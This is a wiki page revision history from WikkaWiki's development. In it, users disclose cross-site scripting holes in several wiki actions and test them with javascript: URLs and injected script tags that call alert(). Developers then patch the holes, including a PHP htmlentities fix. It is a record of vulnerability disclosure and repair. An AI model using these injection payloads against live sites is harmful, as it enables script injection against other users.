Revision history for MySandbox


Revision [19443]

Last edited on 2008-01-28 00:16:02 by JavaWoman [Modified links pointing to docs server]

No Differences

Revision [17834]

Edited on 2007-12-12 13:14:37 by JavaWoman [prevent function references looking as page links]
Additions:
I just patched up the actions to feed the appropriate items through ""ReturnSafeHTML()"".
Deletions:
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().

Revision [16968]

Edited on 2007-05-31 23:27:31 by DreckFehler [Reverted]
Additions:
for ($a = 0; $a < count($matches[0]); $a++) {
Deletions:
for ($a = 0; $a < count($matches[0]); $a ) {

Revision [16767]

Edited on 2007-05-31 10:45:46 by YmjNb5 [Reverted]
Additions:
for ($a = 0; $a < count($matches[0]); $a ) {
Deletions:
for ($a = 0; $a < count($matches[0]); $a++) {

Revision [937]

Edited on 2004-08-08 18:47:18 by DreckFehler [moved rss-caching stuff]
Additions:
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of romans exploit's hook in.
Hey Dreck, I do have a request.
although the problem is solved, moved the stuff to CachingRSS and added some remarks
thanks ;) and (of course) thanks for the hint! --DreckFehler
Deletions:
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of iwans exploit's hook in.
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Update: Nevermind the plea. I'm going to use PHP's parse_url().
test test2

Revision [936]

Edited on 2004-08-08 17:26:06 by RomanIvanov [Said thanks to Wikka team =)]
Additions:
Good work, guys =)
-- RomanIvanov

Revision [934]

Edited on 2004-08-08 15:09:22 by JsnX [testing]
Additions:
test test2
Deletions:
test

Revision [932]

Edited on 2004-08-08 14:34:00 by JsnX [testing]
Additions:
test

Revision [930]

Edited on 2004-08-08 14:11:58 by JsnX [all set....]
Additions:
Update: Nevermind the plea. I'm going to use PHP's parse_url().

Revision [929]

Edited on 2004-08-08 13:11:21 by JsnX [Plea for help fom DreckFehler :)]
Additions:
----
Yeah, that Roman guy is a big trouble-maker. ;)
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?

Revision [928]

Edited on 2004-08-08 12:50:33 by JsnX [fixed XSS risks that Roman pointed out]
Additions:
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''

Revision [927]

Edited on 2004-08-08 12:11:14 by DreckFehler [a trial to fix that exploit]
Additions:
any suggestions how to address this issue?
here is mine (which doesn't fix the rss-exploit, but i seem to have some more general probs with the rss-action in my wikka-installation. and this exploit isn't located in the parameter-handling. it has to be handled in the rss-action itself):
%%(php)<?
if (is_array($matches)) {
for ($a = 0; $a < count($matches[0]); $a++) {
$vars[$matches[1][$a]] = htmlentities($matches[2][$a], ENT_QUOTES);
}
}
$vars["wakka_vars"] = htmlentities(trim($vars_temp), ENT_QUOTES);
?>%%
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of iwans exploit's hook in.
i hate that guys who cause problems but omit the solutions ;)

Revision [926]

Edited on 2004-08-08 07:29:02 by RomanIvanov [a trial to fix that exploit]
Additions:
====rss action has an XSS and also supposed unsafe because any malefactor can generated BIG amount of incoming traffic, which may be expensive.====
Deletions:
Hmm.

Revision [925]

Edited on 2004-08-08 07:25:59 by RomanIvanov [a trial to fix that exploit]
Additions:
{{rss url="http://ar.sky.ru/xss.xml" cache="cachef.xml"}}
Deletions:
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}

Revision [924]

Edited on 2004-08-08 07:22:05 by RomanIvanov [a trial to fix that exploit]
Additions:
Hmm.
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}

Revision [923]

Edited on 2004-08-08 07:15:43 by RomanIvanov [a trial to fix that exploit]
Additions:
====table action has an XSS.====
====googleform action has an XSS.====
Deletions:
table action has an XSS.

Revision [922]

Edited on 2004-08-08 07:15:20 by RomanIvanov [a trial to fix that exploit]
Additions:
table action has an XSS.
{{googleform q="'><script>alert(2)</script>"}}

Revision [921]

Edited on 2004-08-08 07:14:10 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellpadding="'><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
{{table cellpadding="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}

Revision [920]

Edited on 2004-08-08 07:13:31 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellpadding="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
{{table cellspacing="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}

Revision [919]

Edited on 2004-08-08 07:13:07 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellspacing="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
{{table cellspacing="><script>alert(1);</script>"}}

Revision [918]

Edited on 2004-08-08 07:11:15 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellspacing="><script>alert(1);</script>"}}
Deletions:
{{image url="javascript:alert('1')"}}
seems to be it's an XSS security hole.
// Fixed. 5/8/04 - JsnX//
It's not last XSS bug here.
// Do you still see others? 5/8/04 - JsnX//
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.

Revision [262]

Edited on 2004-05-10 03:46:18 by RomanIvanov [a trial to fix that exploit]
Deletions:
[[javascript:alert(1)]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]

Revision [261]

Edited on 2004-05-10 03:45:32 by RomanIvanov [a trial to fix that exploit]
Additions:
[[javascript:alert(1)]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]

Revision [260]

Edited on 2004-05-09 17:20:26 by RomanIvanov [a trial to fix that exploit]
Additions:
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.

Revision [253]

Edited on 2004-05-08 14:47:30 by 217.114.9.102 [a trial to fix that exploit]
Deletions:
~-autoindent
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar

Revision [252]

Edited on 2004-05-08 14:47:17 by 217.114.9.102 [a trial to fix that exploit]
Additions:
~-autoindent
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar

Revision [251]

Edited on 2004-05-08 13:13:25 by JsnX [a trial to fix that exploit]
Additions:
// Fixed. 5/8/04 - JsnX//
// Do you still see others? 5/8/04 - JsnX//

Revision [250]

Edited on 2004-05-08 12:47:55 by JsnX [a trial to fix that exploit]
Additions:
{{image url="javascript:alert('1')"}}
Deletions:
{{image url="images/dvdvideo.gif" alt="javascript:alert('1')"}}

Revision [249]

Edited on 2004-05-08 12:41:15 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvdvideo.gif" alt="javascript:alert('1')"}}
Deletions:
{{image url="images/dvdvideo.gif" class="javascript:alert('1')"}}

Revision [248]

Edited on 2004-05-08 12:40:12 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvdvideo.gif" class="javascript:alert('1')"}}
Deletions:
{{image url="images/dvdvideo.gif" title="javascript:alert('1')"}}

Revision [247]

Edited on 2004-05-08 12:39:49 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvdvideo.gif" title="javascript:alert('1')"}}
Deletions:
{{image url="images/dvd.gif" title="javascript:alert('1')"}}

Revision [246]

Edited on 2004-05-08 12:39:39 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvd.gif" title="javascript:alert('1')"}}
Deletions:
{{image url="images\dvd.gif" title="javascript:alert('1')"}}

Revision [245]

Edited on 2004-05-08 12:39:06 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images\dvd.gif" title="javascript:alert('1')"}}
Deletions:
{{image url="images\dvd" title="javascript:alert('1')"}}

Revision [244]

Edited on 2004-05-08 12:38:41 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images\dvd" title="javascript:alert('1')"}}
Deletions:
{{image url="javascript:alert('1')"}}

Revision [238]

Edited on 2004-05-03 20:33:18 by RomanIvanov [Security hole found.]
Additions:
It's not last XSS bug here.

Revision [232]

Edited on 2004-05-03 20:13:14 by 80.78.105.158 [Security hole found.]
Additions:
seems to be it's an XSS security hole.

Revision [231]

The oldest known version of this page was created on 2004-05-03 20:12:12 by 80.78.105.158 [Security hole found.]
Valid XHTML :: Valid CSS: :: Powered by WikkaWiki